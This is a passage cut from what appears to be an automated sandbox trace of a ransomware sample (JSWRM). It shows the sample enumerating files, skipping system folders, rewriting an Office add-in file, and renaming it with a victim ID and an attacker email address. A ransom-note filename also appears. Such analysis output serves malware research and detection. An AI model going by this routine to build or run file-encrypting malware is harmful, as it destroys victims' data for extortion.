hHeap=0x1e0000) returned 1 [0125.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0125.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0125.537] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x417cb9d0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x417cb9d0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x417cb9d0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0125.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.538] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbdc8437, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbdc8437, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12058, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.538] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0125.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0125.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0125.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.539] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb713a45, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb713a45, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb78613f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0125.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0125.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0125.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0125.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.539] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.539] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.540] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.540] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.540] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.540] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.540] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.540] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.540] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0125.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0125.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0125.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0125.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0125.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0125.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.540] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16035c5a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x160a83ba, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ea7c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sv.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2=".") returned 1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="..") returned 1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="...") returned 1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="windows") returned -1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="recovery") returned -1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="perflogs") returned 1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="documents and settings") returned 1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="system volume information") returned -1 [0125.540] lstrcmpiW (lpString1="PowerViewRes.sv.xap", lpString2="msocache") returned 1 [0125.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sv.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0125.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sv.xap", cchWideChar=19, lpMultiByteStr=0x240f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sv.xap", lpUsedDefaultChar=0x0) returned 19 [0125.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sv.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0125.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.sv.xap", cchWideChar=19, lpMultiByteStr=0x240fe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.sv.xap", lpUsedDefaultChar=0x0) returned 19 [0125.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0125.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sv\\PowerViewRes.sv.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sv\\powerviewres.sv.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.542] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=322172) returned 1 [0125.542] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.542] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.556] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.556] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.557] CloseHandle (hObject=0x338) returned 1 [0125.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0125.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0125.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0125.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0125.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.557] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sv\\PowerViewRes.sv.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sv\\powerviewres.sv.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sv\\PowerViewRes.sv.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sv\\powerviewres.sv.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0125.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0125.558] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16035c5a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x160a83ba, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ea7c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sv.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.559] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0125.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0125.559] HeapFree (in: 